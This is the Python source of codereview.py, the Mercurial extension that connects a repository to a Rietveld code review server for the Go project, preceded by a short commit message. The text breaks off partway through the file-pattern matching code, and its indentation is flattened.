Fixes issue 2569 (hg undo crashes when CL not found).
R=golang-dev, rsc
CC=golang-dev
http://codereview.appspot.com/5489052
Committer: Russ Cox <5ad239cb8a44f659eaaee0aa1ea5b94947abe557@golang.org>
# coding=utf-8
# (The line above is necessary so that I can use 世界 in the
# *comment* below without Python getting all bent out of shape.)
# Copyright 2007-2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Mercurial interface to codereview.appspot.com.
To configure, set the following options in
your repository's .hg/hgrc file.
[extensions]
codereview = /path/to/codereview.py
[codereview]
server = codereview.appspot.com
The server should be running Rietveld; see http://code.google.com/p/rietveld/.
In addition to the new commands, this extension introduces
the file pattern syntax @nnnnnn, where nnnnnn is a change list
number, to mean the files included in that change list, which
must be associated with the current client.
For example, if change 123456 contains the files x.go and y.go,
"hg diff @123456" is equivalent to"hg diff x.go y.go".
'''
import sys
if __name__ == "__main__":
print >>sys.stderr, "This is a Mercurial extension and should not be invoked directly."
sys.exit(2)
# We require Python 2.6 for the json package.
if sys.version < '2.6':
print >>sys.stderr, "The codereview extension requires Python 2.6 or newer."
print >>sys.stderr, "You are running Python " + sys.version
sys.exit(2)
import json
import os
import re
import stat
import subprocess
import threading
import time
from mercurial import commands as hg_commands
from mercurial import util as hg_util
defaultcc = None
codereview_disabled = None
real_rollback = None
releaseBranch = None
server = "codereview.appspot.com"
server_url_base = None
#######################################################################
# Normally I would split this into multiple files, but it simplifies
# import path headaches to keep it all in one file. Sorry.
# The different parts of the file are separated by banners like this one.
#######################################################################
# Helpers
def RelativePath(path, cwd):
n = len(cwd)
if path.startswith(cwd) and path[n] == '/':
return path[n+1:]
return path
def Sub(l1, l2):
return [l for l in l1 if l not in l2]
def Add(l1, l2):
l = l1 + Sub(l2, l1)
l.sort()
return l
def Intersect(l1, l2):
return [l for l in l1 if l in l2]
#######################################################################
# RE: UNICODE STRING HANDLING
#
# Python distinguishes between the str (string of bytes)
# and unicode (string of code points) types. Most operations
# work on either one just fine, but some (like regexp matching)
# require unicode, and others (like write) require str.
#
# As befits the language, Python hides the distinction between
# unicode and str by converting between them silently, but
# *only* if all the bytes/code points involved are 7-bit ASCII.
# This means that if you're not careful, your program works
# fine on "hello, world" and fails on "hello, 世界". And of course,
# the obvious way to be careful - use static types - is unavailable.
# So the only way is trial and error to find where to put explicit
# conversions.
#
# Because more functions do implicit conversion to str (string of bytes)
# than do implicit conversion to unicode (string of code points),
# the convention in this module is to represent all text as str,
# converting to unicode only when calling a unicode-only function
# and then converting back to str as soon as possible.
def typecheck(s, t):
if type(s) != t:
raise hg_util.Abort("type check failed: %s has type %s != %s" % (repr(s), type(s), t))
# If we have to pass unicode instead of str, ustr does that conversion clearly.
def ustr(s):
typecheck(s, str)
return s.decode("utf-8")
# Even with those, Mercurial still sometimes turns unicode into str
# and then tries to use it as ascii. Change Mercurial's default.
def set_mercurial_encoding_to_utf8():
from mercurial import encoding
encoding.encoding = 'utf-8'
set_mercurial_encoding_to_utf8()
# Even with those we still run into problems.
# I tried to do things by the book but could not convince
# Mercurial to let me check in a change with UTF-8 in the
# CL description or author field, no matter how many conversions
# between str and unicode I inserted and despite changing the
# default encoding. I'm tired of this game, so set the default
# encoding for all of Python to 'utf-8', not 'ascii'.
def default_to_utf8():
import sys
stdout, __stdout__ = sys.stdout, sys.__stdout__
reload(sys) # site.py deleted setdefaultencoding; get it back
sys.stdout, sys.__stdout__ = stdout, __stdout__
sys.setdefaultencoding('utf-8')
default_to_utf8()
#######################################################################
# Status printer for long-running commands
global_status = None
def set_status(s):
# print >>sys.stderr, "\t", time.asctime(), s
global global_status
global_status = s
class StatusThread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
# pause a reasonable amount of time before
# starting to display status messages, so that
# most hg commands won't ever see them.
time.sleep(30)
# now show status every 15 seconds
while True:
time.sleep(15 - time.time() % 15)
s = global_status
if s is None:
continue
if s == "":
s = "(unknown status)"
print >>sys.stderr, time.asctime(), s
def start_status_thread():
t = StatusThread()
t.setDaemon(True) # allowed to exit if t is still running
t.start()
#######################################################################
# Change list parsing.
#
# Change lists are stored in .hg/codereview/cl.nnnnnn
# where nnnnnn is the number assigned by the code review server.
# Most data about a change list is stored on the code review server
# too: the description, reviewer, and cc list are all stored there.
# The only thing in the cl.nnnnnn file is the list of relevant files.
# Also, the existence of the cl.nnnnnn file marks this repository
# as the one where the change list lives.
emptydiff = """Index: ~rietveld~placeholder~
===================================================================
diff --git a/~rietveld~placeholder~ b/~rietveld~placeholder~
new file mode 100644
"""
class CL(object):
def __init__(self, name):
typecheck(name, str)
self.name = name
self.desc = ''
self.files = []
self.reviewer = []
self.cc = []
self.url = ''
self.local = False
self.web = False
self.copied_from = None # None means current user
self.mailed = False
self.private = False
self.lgtm = []
def DiskText(self):
cl = self
s = ""
if cl.copied_from:
s += "Author: " + cl.copied_from + "\n\n"
if cl.private:
s += "Private: " + str(self.private) + "\n"
s += "Mailed: " + str(self.mailed) + "\n"
s += "Description:\n"
s += Indent(cl.desc, "\t")
s += "Files:\n"
for f in cl.files:
s += "\t" + f + "\n"
typecheck(s, str)
return s
def EditorText(self):
cl = self
s = _change_prolog
s += "\n"
if cl.copied_from:
s += "Author: " + cl.copied_from + "\n"
if cl.url != '':
s += 'URL: ' + cl.url + ' # cannot edit\n\n'
if cl.private:
s += "Private: True\n"
s += "Reviewer: " + JoinComma(cl.reviewer) + "\n"
s += "CC: " + JoinComma(cl.cc) + "\n"
s += "\n"
s += "Description:\n"
if cl.desc == '':
s += "\t<enter description here>\n"
else:
s += Indent(cl.desc, "\t")
s += "\n"
if cl.local or cl.name == "new":
s += "Files:\n"
for f in cl.files:
s += "\t" + f + "\n"
s += "\n"
typecheck(s, str)
return s
def PendingText(self, quick=False):
cl = self
s = cl.name + ":" + "\n"
s += Indent(cl.desc, "\t")
s += "\n"
if cl.copied_from:
s += "\tAuthor: " + cl.copied_from + "\n"
if not quick:
s += "\tReviewer: " + JoinComma(cl.reviewer) + "\n"
for (who, line) in cl.lgtm:
s += "\t\t" + who + ": " + line + "\n"
s += "\tCC: " + JoinComma(cl.cc) + "\n"
s += "\tFiles:\n"
for f in cl.files:
s += "\t\t" + f + "\n"
typecheck(s, str)
return s
def Flush(self, ui, repo):
if self.name == "new":
self.Upload(ui, repo, gofmt_just_warn=True, creating=True)
dir = CodeReviewDir(ui, repo)
path = dir + '/cl.' + self.name
f = open(path+'!', "w")
f.write(self.DiskText())
f.close()
if sys.platform == "win32" and os.path.isfile(path):
os.remove(path)
os.rename(path+'!', path)
if self.web and not self.copied_from:
EditDesc(self.name, desc=self.desc,
reviewers=JoinComma(self.reviewer), cc=JoinComma(self.cc),
private=self.private)
def Delete(self, ui, repo):
dir = CodeReviewDir(ui, repo)
os.unlink(dir + "/cl." + self.name)
def Subject(self):
s = line1(self.desc)
if len(s) > 60:
s = s[0:55] + "..."
if self.name != "new":
s = "code review %s: %s" % (self.name, s)
typecheck(s, str)
return s
def Upload(self, ui, repo, send_mail=False, gofmt=True, gofmt_just_warn=False, creating=False, quiet=False):
if not self.files and not creating:
ui.warn("no files in change list\n")
if ui.configbool("codereview", "force_gofmt", True) and gofmt:
CheckFormat(ui, repo, self.files, just_warn=gofmt_just_warn)
set_status("uploading CL metadata + diffs")
os.chdir(repo.root)
form_fields = [
("content_upload", "1"),
("reviewers", JoinComma(self.reviewer)),
("cc", JoinComma(self.cc)),
("description", self.desc),
("base_hashes", ""),
]
if self.name != "new":
form_fields.append(("issue", self.name))
vcs = None
# We do not include files when creating the issue,
# because we want the patch sets to record the repository
# and base revision they are diffs against. We use the patch
# set message for that purpose, but there is no message with
# the first patch set. Instead the message gets used as the
# new CL's overall subject. So omit the diffs when creating
# and then we'll run an immediate upload.
# This has the effect that every CL begins with an empty "Patch set 1".
if self.files and not creating:
vcs = MercurialVCS(upload_options, ui, repo)
data = vcs.GenerateDiff(self.files)
files = vcs.GetBaseFiles(data)
if len(data) > MAX_UPLOAD_SIZE:
uploaded_diff_file = []
form_fields.append(("separate_patches", "1"))
else:
uploaded_diff_file = [("data", "data.diff", data)]
else:
uploaded_diff_file = [("data", "data.diff", emptydiff)]
if vcs and self.name != "new":
form_fields.append(("subject", "diff -r " + vcs.base_rev + " " + ui.expandpath("default")))
else:
# First upload sets the subject for the CL itself.
form_fields.append(("subject", self.Subject()))
ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
response_body = MySend("/upload", body, content_type=ctype)
patchset = None
msg = response_body
lines = msg.splitlines()
if len(lines) >= 2:
msg = lines[0]
patchset = lines[1].strip()
patches = [x.split(" ", 1) for x in lines[2:]]
if response_body.startswith("Issue updated.") and quiet:
pass
else:
ui.status(msg + "\n")
set_status("uploaded CL metadata + diffs")
if not response_body.startswith("Issue created.") and not response_body.startswith("Issue updated."):
raise hg_util.Abort("failed to update issue: " + response_body)
issue = msg[msg.rfind("/")+1:]
self.name = issue
if not self.url:
self.url = server_url_base + self.name
if not uploaded_diff_file:
set_status("uploading patches")
patches = UploadSeparatePatches(issue, rpc, patchset, data, upload_options)
if vcs:
set_status("uploading base files")
vcs.UploadBaseFiles(issue, rpc, patches, patchset, upload_options, files)
if send_mail:
set_status("sending mail")
MySend("/" + issue + "/mail", payload="")
self.web = True
set_status("flushing changes to disk")
self.Flush(ui, repo)
return
def Mail(self, ui, repo):
pmsg = "Hello " + JoinComma(self.reviewer)
if self.cc:
pmsg += " (cc: %s)" % (', '.join(self.cc),)
pmsg += ",\n"
pmsg += "\n"
repourl = ui.expandpath("default")
if not self.mailed:
pmsg += "I'd like you to review this change to\n" + repourl + "\n"
else:
pmsg += "Please take another look.\n"
typecheck(pmsg, str)
PostMessage(ui, self.name, pmsg, subject=self.Subject())
self.mailed = True
self.Flush(ui, repo)
def GoodCLName(name):
typecheck(name, str)
return re.match("^[0-9]+$", name)
def ParseCL(text, name):
typecheck(text, str)
typecheck(name, str)
sname = None
lineno = 0
sections = {
'Author': '',
'Description': '',
'Files': '',
'URL': '',
'Reviewer': '',
'CC': '',
'Mailed': '',
'Private': '',
}
for line in text.split('\n'):
lineno += 1
line = line.rstrip()
if line != '' and line[0] == '#':
continue
if line == '' or line[0] == ' ' or line[0] == '\t':
if sname == None and line != '':
return None, lineno, 'text outside section'
if sname != None:
sections[sname] += line + '\n'
continue
p = line.find(':')
if p >= 0:
s, val = line[:p].strip(), line[p+1:].strip()
if s in sections:
sname = s
if val != '':
sections[sname] += val + '\n'
continue
return None, lineno, 'malformed section header'
for k in sections:
sections[k] = StripCommon(sections[k]).rstrip()
cl = CL(name)
if sections['Author']:
cl.copied_from = sections['Author']
cl.desc = sections['Description']
for line in sections['Files'].split('\n'):
i = line.find('#')
if i >= 0:
line = line[0:i].rstrip()
line = line.strip()
if line == '':
continue
cl.files.append(line)
cl.reviewer = SplitCommaSpace(sections['Reviewer'])
cl.cc = SplitCommaSpace(sections['CC'])
cl.url = sections['URL']
if sections['Mailed'] != 'False':
# Odd default, but avoids spurious mailings when
# reading old CLs that do not have a Mailed: line.
# CLs created with this update will always have
# Mailed: False on disk.
cl.mailed = True
if sections['Private'] in ('True', 'true', 'Yes', 'yes'):
cl.private = True
if cl.desc == '<enter description here>':
cl.desc = ''
return cl, 0, ''
def SplitCommaSpace(s):
typecheck(s, str)
s = s.strip()
if s == "":
return []
return re.split(", *", s)
def CutDomain(s):
typecheck(s, str)
i = s.find('@')
if i >= 0:
s = s[0:i]
return s
def JoinComma(l):
for s in l:
typecheck(s, str)
return ", ".join(l)
def ExceptionDetail():
s = str(sys.exc_info()[0])
if s.startswith("<type '") and s.endswith("'>"):
s = s[7:-2]
elif s.startswith("<class '") and s.endswith("'>"):
s = s[8:-2]
arg = str(sys.exc_info()[1])
if len(arg) > 0:
s += ": " + arg
return s
def IsLocalCL(ui, repo, name):
return GoodCLName(name) and os.access(CodeReviewDir(ui, repo) + "/cl." + name, 0)
# Load CL from disk and/or the web.
def LoadCL(ui, repo, name, web=True):
typecheck(name, str)
set_status("loading CL " + name)
if not GoodCLName(name):
return None, "invalid CL name"
dir = CodeReviewDir(ui, repo)
path = dir + "cl." + name
if os.access(path, 0):
ff = open(path)
text = ff.read()
ff.close()
cl, lineno, err = ParseCL(text, name)
if err != "":
return None, "malformed CL data: "+err
cl.local = True
else:
cl = CL(name)
if web:
set_status("getting issue metadata from web")
d = JSONGet(ui, "/api/" + name + "?messages=true")
set_status(None)
if d is None:
return None, "cannot load CL %s from server" % (name,)
if 'owner_email' not in d or 'issue' not in d or str(d['issue']) != name:
return None, "malformed response loading CL data from code review server"
cl.dict = d
cl.reviewer = d.get('reviewers', [])
cl.cc = d.get('cc', [])
if cl.local and cl.copied_from and cl.desc:
# local copy of CL written by someone else
# and we saved a description. use that one,
# so that committers can edit the description
# before doing hg submit.
pass
else:
cl.desc = d.get('description', "")
cl.url = server_url_base + name
cl.web = True
cl.private = d.get('private', False) != False
cl.lgtm = []
for m in d.get('messages', []):
if m.get('approval', False) == True:
who = re.sub('@.*', '', m.get('sender', ''))
text = re.sub("\n(.|\n)*", '', m.get('text', ''))
cl.lgtm.append((who, text))
set_status("loaded CL " + name)
return cl, ''
class LoadCLThread(threading.Thread):
def __init__(self, ui, repo, dir, f, web):
threading.Thread.__init__(self)
self.ui = ui
self.repo = repo
self.dir = dir
self.f = f
self.web = web
self.cl = None
def run(self):
cl, err = LoadCL(self.ui, self.repo, self.f[3:], web=self.web)
if err != '':
self.ui.warn("loading "+self.dir+self.f+": " + err + "\n")
return
self.cl = cl
# Load all the CLs from this repository.
def LoadAllCL(ui, repo, web=True):
dir = CodeReviewDir(ui, repo)
m = {}
files = [f for f in os.listdir(dir) if f.startswith('cl.')]
if not files:
return m
active = []
first = True
for f in files:
t = LoadCLThread(ui, repo, dir, f, web)
t.start()
if web and first:
# first request: wait in case it needs to authenticate
# otherwise we get lots of user/password prompts
# running in parallel.
t.join()
if t.cl:
m[t.cl.name] = t.cl
first = False
else:
active.append(t)
for t in active:
t.join()
if t.cl:
m[t.cl.name] = t.cl
return m
# Find repository root. On error, ui.warn and return None
def RepoDir(ui, repo):
url = repo.url();
if not url.startswith('file:'):
ui.warn("repository %s is not in local file system\n" % (url,))
return None
url = url[5:]
if url.endswith('/'):
url = url[:-1]
typecheck(url, str)
return url
# Find (or make) code review directory. On error, ui.warn and return None
def CodeReviewDir(ui, repo):
dir = RepoDir(ui, repo)
if dir == None:
return None
dir += '/.hg/codereview/'
if not os.path.isdir(dir):
try:
os.mkdir(dir, 0700)
except:
ui.warn('cannot mkdir %s: %s\n' % (dir, ExceptionDetail()))
return None
typecheck(dir, str)
return dir
# Turn leading tabs into spaces, so that the common white space
# prefix doesn't get confused when people's editors write out
# some lines with spaces, some with tabs. Only a heuristic
# (some editors don't use 8 spaces either) but a useful one.
def TabsToSpaces(line):
i = 0
while i < len(line) and line[i] == '\t':
i += 1
return ' '*(8*i) + line[i:]
# Strip maximal common leading white space prefix from text
def StripCommon(text):
typecheck(text, str)
ws = None
for line in text.split('\n'):
line = line.rstrip()
if line == '':
continue
line = TabsToSpaces(line)
white = line[:len(line)-len(line.lstrip())]
if ws == None:
ws = white
else:
common = ''
for i in range(min(len(white), len(ws))+1):
if white[0:i] == ws[0:i]:
common = white[0:i]
ws = common
if ws == '':
break
if ws == None:
return text
t = ''
for line in text.split('\n'):
line = line.rstrip()
line = TabsToSpaces(line)
if line.startswith(ws):
line = line[len(ws):]
if line == '' and t == '':
continue
t += line + '\n'
while len(t) >= 2 and t[-2:] == '\n\n':
t = t[:-1]
typecheck(t, str)
return t
# Indent text with indent.
def Indent(text, indent):
typecheck(text, str)
typecheck(indent, str)
t = ''
for line in text.split('\n'):
t += indent + line + '\n'
typecheck(t, str)
return t
# Return the first line of l
def line1(text):
typecheck(text, str)
return text.split('\n')[0]
_change_prolog = """# Change list.
# Lines beginning with # are ignored.
# Multi-line values should be indented.
"""
desc_re = '^(.+: |(tag )?(release|weekly)\.|fix build|undo CL)'
desc_msg = '''Your CL description appears not to use the standard form.
The first line of your change description is conventionally a
one-line summary of the change, prefixed by the primary affected package,
and is used as the subject for code review mail; the rest of the description
elaborates.
Examples:
encoding/rot13: new package
math: add IsInf, IsNaN
net: fix cname in LookupHost
unicode: update to Unicode 5.0.2
'''
def promptyesno(ui, msg):
return ui.promptchoice(msg, ["&yes", "&no"], 0) == 0
def promptremove(ui, repo, f):
if promptyesno(ui, "hg remove %s (y/n)?" % (f,)):
if hg_commands.remove(ui, repo, 'path:'+f) != 0:
ui.warn("error removing %s" % (f,))
def promptadd(ui, repo, f):
if promptyesno(ui, "hg add %s (y/n)?" % (f,)):
if hg_commands.add(ui, repo, 'path:'+f) != 0:
ui.warn("error adding %s" % (f,))
def EditCL(ui, repo, cl):
set_status(None) # do not show status
s = cl.EditorText()
while True:
s = ui.edit(s, ui.username())
# We can't trust Mercurial + Python not to die before making the change,
# so, by popular demand, just scribble the most recent CL edit into
# $(hg root)/last-change so that if Mercurial does die, people
# can look there for their work.
try:
f = open(repo.root+"/last-change", "w")
f.write(s)
f.close()
except:
pass
clx, line, err = ParseCL(s, cl.name)
if err != '':
if not promptyesno(ui, "error parsing change list: line %d: %s\nre-edit (y/n)?" % (line, err)):
return "change list not modified"
continue
# Check description.
if clx.desc == '':
if promptyesno(ui, "change list should have a description\nre-edit (y/n)?"):
continue
elif re.search('<enter reason for undo>', clx.desc):
if promptyesno(ui, "change list description omits reason for undo\nre-edit (y/n)?"):
continue
elif not re.match(desc_re, clx.desc.split('\n')[0]):
if promptyesno(ui, desc_msg + "re-edit (y/n)?"):
continue
# Check file list for files that need to be hg added or hg removed
# or simply aren't understood.
pats = ['path:'+f for f in clx.files]
changed = hg_matchPattern(ui, repo, *pats, modified=True, added=True, removed=True)
deleted = hg_matchPattern(ui, repo, *pats, deleted=True)
unknown = hg_matchPattern(ui, repo, *pats, unknown=True)
ignored = hg_matchPattern(ui, repo, *pats, ignored=True)
clean = hg_matchPattern(ui, repo, *pats, clean=True)
files = []
for f in clx.files:
if f in changed:
files.append(f)
continue
if f in deleted:
promptremove(ui, repo, f)
files.append(f)
continue
if f in unknown:
promptadd(ui, repo, f)
files.append(f)
continue
if f in ignored:
ui.warn("error: %s is excluded by .hgignore; omitting\n" % (f,))
continue
if f in clean:
ui.warn("warning: %s is listed in the CL but unchanged\n" % (f,))
files.append(f)
continue
p = repo.root + '/' + f
if os.path.isfile(p):
ui.warn("warning: %s is a file but not known to hg\n" % (f,))
files.append(f)
continue
if os.path.isdir(p):
ui.warn("error: %s is a directory, not a file; omitting\n" % (f,))
continue
ui.warn("error: %s does not exist; omitting\n" % (f,))
clx.files = files
cl.desc = clx.desc
cl.reviewer = clx.reviewer
cl.cc = clx.cc
cl.files = clx.files
cl.private = clx.private
break
return ""
# For use by submit, etc. (NOT by change)
# Get change list number or list of files from command line.
# If files are given, make a new change list.
def CommandLineCL(ui, repo, pats, opts, defaultcc=None):
if len(pats) > 0 and GoodCLName(pats[0]):
if len(pats) != 1:
return None, "cannot specify change number and file names"
if opts.get('message'):
return None, "cannot use -m with existing CL"
cl, err = LoadCL(ui, repo, pats[0], web=True)
if err != "":
return None, err
else:
cl = CL("new")
cl.local = True
cl.files = ChangedFiles(ui, repo, pats, taken=Taken(ui, repo))
if not cl.files:
return None, "no files changed"
if opts.get('reviewer'):
cl.reviewer = Add(cl.reviewer, SplitCommaSpace(opts.get('reviewer')))
if opts.get('cc'):
cl.cc = Add(cl.cc, SplitCommaSpace(opts.get('cc')))
if defaultcc:
cl.cc = Add(cl.cc, defaultcc)
if cl.name == "new":
if opts.get('message'):
cl.desc = opts.get('message')
else:
err = EditCL(ui, repo, cl)
if err != '':
return None, err
return cl, ""
#######################################################################
# Change list file management
# Return list of changed files in repository that match pats.
# The patterns came from the command line, so we warn
# if they have no effect or cannot be understood.
def ChangedFiles(ui, repo, pats, taken=None):
taken = taken or {}
# Run each pattern separately so that we can warn about
# patterns that didn't do anything useful.
for p in pats:
for f in hg_matchPattern(ui, repo, p, unknown=True):
promptadd(ui, repo, f)
for f in hg_matchPattern(ui, repo, p, removed=True):
promptremove(ui, repo, f)
files = hg_matchPattern(ui, repo, p, modified=True, added=True, removed=True)
for f in files:
if f in taken:
ui.warn("warning: %s already in CL %s\n" % (f, taken[f].name))
if not files:
ui.warn("warning: %s did not match any modified files\n" % (p,))
# Again, all at once (eliminates duplicates)
l = hg_matchPattern(ui, repo, *pats, modified=True, added=True, removed=True)
l.sort()
if taken:
l = Sub(l, taken.keys())
return l
# Return list of changed files in repository that match pats and still exist.
def ChangedExistingFiles(ui, repo, pats, opts):
l = hg_matchPattern(ui, repo, *pats, modified=True, added=True)
l.sort()
return l
# Return list of files claimed by existing CLs
def Taken(ui, repo):
all = LoadAllCL(ui, repo, web=False)
taken = {}
for _, cl in all.items():
for f in cl.files:
taken[f] = cl
return taken
# Return list of changed files that are not claimed by other CLs
def DefaultFiles(ui, repo, pats):
return ChangedFiles(ui, repo, pats, taken=Taken(ui, repo))
#######################################################################
# File format checking.
def CheckFormat(ui, repo, files, just_warn=False):
set_status("running gofmt")
CheckGofmt(ui, repo, files, just_warn)
CheckTabfmt(ui, repo, files, just_warn)
# Check that gofmt run on the list of files does not change them
def CheckGofmt(ui, repo, files, just_warn):
files = [f for f in files if (not f.startswith('test/') or f.startswith('test/bench/')) and f.endswith('.go')]
if not files:
return
cwd = os.getcwd()
files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
files = [f for f in files if os.access(f, 0)]
if not files:
return
try:
cmd = subprocess.Popen(["gofmt", "-l"] + files, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=sys.platform != "win32")
cmd.stdin.close()
except:
raise hg_util.Abort("gofmt: " + ExceptionDetail())
data = cmd.stdout.read()
errors = cmd.stderr.read()
cmd.wait()
set_status("done with gofmt")
if len(errors) > 0:
ui.warn("gofmt errors:\n" + errors.rstrip() + "\n")
return
if len(data) > 0:
msg = "gofmt needs to format these files (run hg gofmt):\n" + Indent(data, "\t").rstrip()
if just_warn:
ui.warn("warning: " + msg + "\n")
else:
raise hg_util.Abort(msg)
return
# Check that *.[chys] files indent using tabs.
def CheckTabfmt(ui, repo, files, just_warn):
files = [f for f in files if f.startswith('src/') and re.search(r"\.[chys]$", f)]
if not files:
return
cwd = os.getcwd()
files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
files = [f for f in files if os.access(f, 0)]
badfiles = []
for f in files:
try:
for line in open(f, 'r'):
# Four leading spaces is enough to complain about,
# except that some Plan 9 code uses four spaces as the label indent,
# so allow that.
if line.startswith(' ') and not re.match(' [A-Za-z0-9_]+:', line):
badfiles.append(f)
break
except:
# ignore cannot open file, etc.
pass
if len(badfiles) > 0:
msg = "these files use spaces for indentation (use tabs instead):\n\t" + "\n\t".join(badfiles)
if just_warn:
ui.warn("warning: " + msg + "\n")
else:
raise hg_util.Abort(msg)
return
#######################################################################
# CONTRIBUTORS file parsing
contributors = {}
def ReadContributors(ui, repo):
global contributors
try:
f = open(repo.root + '/CONTRIBUTORS', 'r')
except:
ui.write("warning: cannot open %s: %s\n" % (repo.root+'/CONTRIBUTORS', ExceptionDetail()))
return
for line in f:
# CONTRIBUTORS is a list of lines like:
# Person <email>
# Person <email> <alt-email>
# The first email address is the one used in commit logs.
if line.startswith('#'):
continue
m = re.match(r"([^<>]+\S)\s+(<[^<>\s]+>)((\s+<[^<>\s]+>)*)\s*$", line)
if m:
name = m.group(1)
email = m.group(2)[1:-1]
contributors[email.lower()] = (name, email)
for extra in m.group(3).split():
contributors[extra[1:-1].lower()] = (name, email)
def CheckContributor(ui, repo, user=None):
set_status("checking CONTRIBUTORS file")
user, userline = FindContributor(ui, repo, user, warn=False)
if not userline:
raise hg_util.Abort("cannot find %s in CONTRIBUTORS" % (user,))
return userline
def FindContributor(ui, repo, user=None, warn=True):
if not user:
user = ui.config("ui", "username")
if not user:
raise hg_util.Abort("[ui] username is not configured in .hgrc")
user = user.lower()
m = re.match(r".*<(.*)>", user)
if m:
user = m.group(1)
if user not in contributors:
if warn:
ui.warn("warning: cannot find %s in CONTRIBUTORS\n" % (user,))
return user, None
user, email = contributors[user]
return email, "%s <%s>" % (user, email)
#######################################################################
# Mercurial helper functions.
# Read http://mercurial.selenic.com/wiki/MercurialApi before writing any of these.
# We use the ui.pushbuffer/ui.popbuffer + hg_commands.xxx tricks for all interaction
# with Mercurial. It has proved the most stable as they make changes.
hgversion = hg_util.version()
# We require Mercurial 1.9 and suggest Mercurial 2.0.
# The details of the scmutil package changed then,
# so allowing earlier versions would require extra band-aids below.
# Ubuntu 11.10 ships with Mercurial 1.9.1 as the default version.
hg_required = "1.9"
hg_suggested = "2.0"
old_message = """
The code review extension requires Mercurial """+hg_required+""" or newer.
You are using Mercurial """+hgversion+""".
To install a new Mercurial, use
sudo easy_install mercurial=="""+hg_suggested+"""
or visit http://mercurial.selenic.com/downloads/.
"""
linux_message = """
You may need to clear your current Mercurial installation by running:
sudo apt-get remove mercurial mercurial-common
sudo rm -rf /etc/mercurial
"""
if hgversion < hg_required:
msg = old_message
if os.access("/etc/mercurial", 0):
msg += linux_message
raise hg_util.Abort(msg)
from mercurial.hg import clean as hg_clean
from mercurial import cmdutil as hg_cmdutil
from mercurial import error as hg_error
from mercurial import match as hg_match
from mercurial import node as hg_node
class uiwrap(object):
def __init__(self, ui):
self.ui = ui
ui.pushbuffer()
self.oldQuiet = ui.quiet
ui.quiet = True
self.oldVerbose = ui.verbose
ui.verbose = False
def output(self):
ui = self.ui
ui.quiet = self.oldQuiet
ui.verbose = self.oldVerbose
return ui.popbuffer()
def to_slash(path):
if sys.platform == "win32":
return path.replace('\\', '/')
return path
def hg_matchPattern(ui, repo, *pats, **opts):
w = uiwrap(ui)
hg_commands.status(ui, repo, *pats, **opts)
text = w.output()
ret = []
prefix = to_slash(os.path.realpath(repo.root))+'/'
for line in text.split('\n'):
f = line.split()
if len(f) > 1:
if len(pats) > 0:
# Given patterns, Mercurial shows relative to cwd
p = to_slash(os.path.realpath(f[1]))
if not p.startswith(prefix):
print >>sys.stderr, "File %s not in repo root %s.\n" % (p, prefix)
else:
ret.append(p[len(prefix):])
else:
# Without patterns, Mercurial shows relative to root (what we want)
ret.append(to_slash(f[1]))
return ret
def hg_heads(ui, repo):
w = uiwrap(ui)
ret = hg_commands.heads(ui, repo)
if ret:
raise hg_util.Abort(ret)
return w.output()
noise = [
"",
"resolving manifests",
"searching for changes",
"couldn't find merge tool hgmerge",
"adding changesets",
"adding manifests",
"adding file changes",
"all local heads known remotely",
]
def isNoise(line):
line = str(line)
for x in noise:
if line == x:
return True
return False
def hg_incoming(ui, repo):
w = uiwrap(ui)
ret = hg_commands.incoming(ui, repo, force=False, bundle="")
if ret and ret != 1:
raise hg_util.Abort(ret)
return w.output()
def hg_log(ui, repo, **opts):
for k in ['date', 'keyword', 'rev', 'user']:
if not opts.has_key(k):
opts[k] = ""
w = uiwrap(ui)
ret = hg_commands.log(ui, repo, **opts)
if ret:
raise hg_util.Abort(ret)
return w.output()
def hg_outgoing(ui, repo, **opts):
w = uiwrap(ui)
ret = hg_commands.outgoing(ui, repo, **opts)
if ret and ret != 1:
raise hg_util.Abort(ret)
return w.output()
def hg_pull(ui, repo, **opts):
w = uiwrap(ui)
ui.quiet = False
ui.verbose = True # for file list
err = hg_commands.pull(ui, repo, **opts)
for line in w.output().split('\n'):
if isNoise(line):
continue
if line.startswith('moving '):
line = 'mv ' + line[len('moving '):]
if line.startswith('getting ') and line.find(' to ') >= 0:
line = 'mv ' + line[len('getting '):]
if line.startswith('getting '):
line = '+ ' + line[len('getting '):]
if line.startswith('removing '):
line = '- ' + line[len('removing '):]
ui.write(line + '\n')
return err
def hg_push(ui, repo, **opts):
w = uiwrap(ui)
ui.quiet = False
ui.verbose = True
err = hg_commands.push(ui, repo, **opts)
for line in w.output().split('\n'):
if not isNoise(line):
ui.write(line + '\n')
return err
def hg_commit(ui, repo, *pats, **opts):
return hg_commands.commit(ui, repo, *pats, **opts)
#######################################################################
# Mercurial precommit hook to disable commit except through this interface.
commit_okay = False
def precommithook(ui, repo, **opts):
if commit_okay:
return False # False means okay.
ui.write("\ncodereview extension enabled; use mail, upload, or submit instead of commit\n\n")
return True
#######################################################################
# @clnumber file pattern support
# We replace scmutil.match with the MatchAt wrapper to add the @clnumber pattern.
match_repo = None
match_ui = None
match_orig = None
def InstallMatch(ui, repo):
global match_repo
global match_ui
global match_orig
match_ui = ui
match_repo = repo
from mercurial import scmutil
match_orig = scmutil.match
scmutil.match = MatchAt
def MatchAt(ctx, pats=None, opts=None, globbed=False, default='relpath'):
taken = []
files = []
pats = pats or []
opts = opts or {}
for p in pats:
if p.startswith('@'):
taken.append(p)
clname = p[1:]
if clname == "default":
files = DefaultFiles(match_ui, match_repo, [])
else:
if not GoodCLName(clname):
raise hg_util.Abort("invalid CL name " + clname)
cl, err = LoadCL(match_repo.ui, match_repo, clname, web=False)
if err != '':
raise hg_util.Abort("loading CL " + clname + ": " + err)
if not cl.files:
raise hg_util.Abort("no files in CL " + clname)
files = Add(files, cl.files)
pats = Sub(pats, taken) + ['path:'+f for f in files]
# work-around for http://selenic.com/hg/rev/785bbc8634f8
if not hasattr(ctx, 'match'):
ctx = ctx[None]
